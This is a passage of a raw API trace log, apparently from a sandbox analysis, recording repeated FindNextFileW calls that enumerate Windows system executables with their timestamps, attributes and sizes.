dwReserved0=0x0, dwReserved1=0x0, cFileName="gpscript.exe", cAlternateFileName="")) returned 1 [0107.982] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ba4ec65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ba4ec65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ba4ec65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6200, dwReserved0=0x0, dwReserved1=0x0, cFileName="gpupdate.exe", cAlternateFileName="")) returned 1 [0107.982] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3155a7fa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3155a7fa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3155a7fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0x0, dwReserved1=0x0, cFileName="grpconv.exe", cAlternateFileName="")) returned 1 [0107.982] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28e5973a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28e5973a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28e5973a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf800, dwReserved0=0x0, dwReserved1=0x0, cFileName="hdwwiz.exe", cAlternateFileName="")) returned 1 [0107.983] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa83350, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa83350, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa83350, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="help.exe", cAlternateFileName="")) returned 1 [0107.983] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cb71a8e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2cb71a8e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2cb71a8e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hh.exe", cAlternateFileName="")) returned 1 [0107.983] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e66a3d4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e66a3d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e66a3d4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="HOSTNAME.EXE", cAlternateFileName="")) returned 1 [0107.983] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29bc2aaf, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29bc2aaf, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29bc2aaf, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7600, dwReserved0=0x0, dwReserved1=0x0, cFileName="icacls.exe", cAlternateFileName="")) returned 1 [0107.983] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x306e640f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x306e640f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x306e640f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="icsunattend.exe", cAlternateFileName="")) returned 1 [0107.983] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e9d0d4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x56e9d0d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x56e9d0d4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ce00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieUnatt.exe", cAlternateFileName="")) returned 1 [0107.983] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56f0f7d8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x56f0f7d8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x56f0f7d8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25400, dwReserved0=0x0, dwReserved1=0x0, cFileName="iexpress.exe", cAlternateFileName="")) returned 1 [0107.984] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29c351c3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29c351c3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29c351c3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfDefaultInstall.exe", cAlternateFileName="")) returned 1 [0107.984] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5855bd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e5855bd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e5855bd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x27400, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallAgent.exe", cAlternateFileName="")) returned 1 [0107.984] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29d40238, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29d40238, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29d40238, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="instnm.exe", cAlternateFileName="")) returned 1 [0107.984] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e69062e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e69062e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e69062e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipconfig.exe", cAlternateFileName="")) returned 1 [0107.984] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac00acd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ac00acd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ac00acd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24600, dwReserved0=0x0, dwReserved1=0x0, cFileName="iscsicli.exe", cAlternateFileName="")) returned 1 [0107.984] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ab8e3bd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ab8e3bd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ab8e3bd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="iscsicpl.exe", cAlternateFileName="")) returned 1 [0107.984] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51fef838, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x51fef838, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x51fef838, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19800, dwReserved0=0x0, dwReserved1=0x0, cFileName="isoburn.exe", cAlternateFileName="")) returned 1 [0107.985] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ktmutil.exe", cAlternateFileName="")) returned 1 [0107.985] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29db2940, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29db2940, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29db2940, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="label.exe", cAlternateFileName="")) returned 1 [0107.985] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29e4b2a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29e4b2a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29e4b2a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ca00, dwReserved0=0x0, dwReserved1=0x0, cFileName="LaunchTM.exe", cAlternateFileName="")) returned 1 [0107.985] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x316193ba, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x316193ba, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x316193ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7400, dwReserved0=0x0, dwReserved1=0x0, cFileName="LaunchWinApp.exe", cAlternateFileName="")) returned 1 [0107.985] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e34927f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e34927f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e34927f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x32c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="licensingdiag.exe", cAlternateFileName="")) returned 1 [0107.985] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3155a7fa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3155a7fa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3155a7fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3d8a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LockAppHost.exe", cAlternateFileName="")) returned 1 [0107.985] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9ea9ee, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2a9ea9ee, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2a9ea9ee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xac00, dwReserved0=0x0, dwReserved1=0x0, cFileName="lodctr.exe", cAlternateFileName="")) returned 1 [0107.986] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ff45f3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x56ff45f3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x56ff45f3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x15200, dwReserved0=0x0, dwReserved1=0x0, cFileName="logagent.exe", cAlternateFileName="")) returned 1 [0107.986] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa36e9f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa36e9f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x18200, dwReserved0=0x0, dwReserved1=0x0, cFileName="logman.exe", cAlternateFileName="")) returned 1 [0107.986] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ce92be3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ce92be3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ce92be3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Magnify.exe", cAlternateFileName="")) returned 1 [0107.986] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28f647a3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28f647a3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28f647a3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="makecab.exe", cAlternateFileName="")) returned 1 [0107.986] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29d19fde, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29d19fde, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29d19fde, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x49c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mcbuilder.exe", cAlternateFileName="")) returned 1 [0107.986] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4fa796, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xd4fa796, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xd4fa796, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7d28, dwReserved0=0x0, dwReserved1=0x0, cFileName="mfpmp.exe", cAlternateFileName="")) returned 1 [0107.986] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x282e0245, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x282e0245, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x282e0245, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17d600, dwReserved0=0x0, dwReserved1=0x0, cFileName="mmc.exe", cAlternateFileName="")) returned 1 [0107.986] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51fc95d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x51fc95d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x51fc95d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mobsync.exe", cAlternateFileName="")) returned 1 [0107.987] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28e7f990, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28e7f990, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28e7f990, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mountvol.exe", cAlternateFileName="")) returned 1 [0107.987] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e66a3d4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e66a3d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e66a3d4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="MRINFO.EXE", cAlternateFileName="")) returned 1 [0107.987] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aaa95a6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aaa95a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aaa95a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x170200, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdt.exe", cAlternateFileName="")) returned 1 [0107.987] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e76e76, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x56e76e76, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x56e76e76, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3400, dwReserved0=0x0, dwReserved1=0x0, cFileName="msfeedssync.exe", cAlternateFileName="")) returned 1 [0107.987] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e76e76, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x56e76e76, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x56e76e76, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3400, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshta.exe", cAlternateFileName="")) returned 1 [0107.988] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x283064a3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x283064a3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x283064a3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe400, dwReserved0=0x0, dwReserved1=0x0, cFileName="msiexec.exe", cAlternateFileName="")) returned 1 [0107.988] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29ebd9b5, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29ebd9b5, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29ee3c08, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x52800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0107.988] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3168bac6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3168bac6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x316b1d24, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62be00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mspaint.exe", cAlternateFileName="")) returned 1 [0107.988] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5faaf16e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5faaf16e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5faaf16e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msra.exe", cAlternateFileName="")) returned 1 [0107.988] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x325725bd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x325725bd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x325725bd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ec600, dwReserved0=0x0, dwReserved1=0x0, cFileName="mstsc.exe", cAlternateFileName="")) returned 1 [0107.988] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ab6816b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ab6816b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ab6816b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1be00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mtstocom.exe", cAlternateFileName="")) returned 1 [0107.988] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29d6648f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29d6648f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29d6648f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xfe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MuiUnattend.exe", cAlternateFileName="")) returned 1 [0107.988] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ce92be3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ce92be3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ce92be3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Narrator.exe", cAlternateFileName="")) returned 1 [0107.989] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28e7f990, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28e7f990, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28e7f990, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xfa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ndadmin.exe", cAlternateFileName="")) returned 1 [0107.989] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b91d98a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2b91d98a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2b91d98a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb400, dwReserved0=0x0, dwReserved1=0x0, cFileName="net.exe", cAlternateFileName="")) returned 1 [0107.989] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2acbf689, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2acbf689, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2acbf689, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x22c00, dwReserved0=0x0, 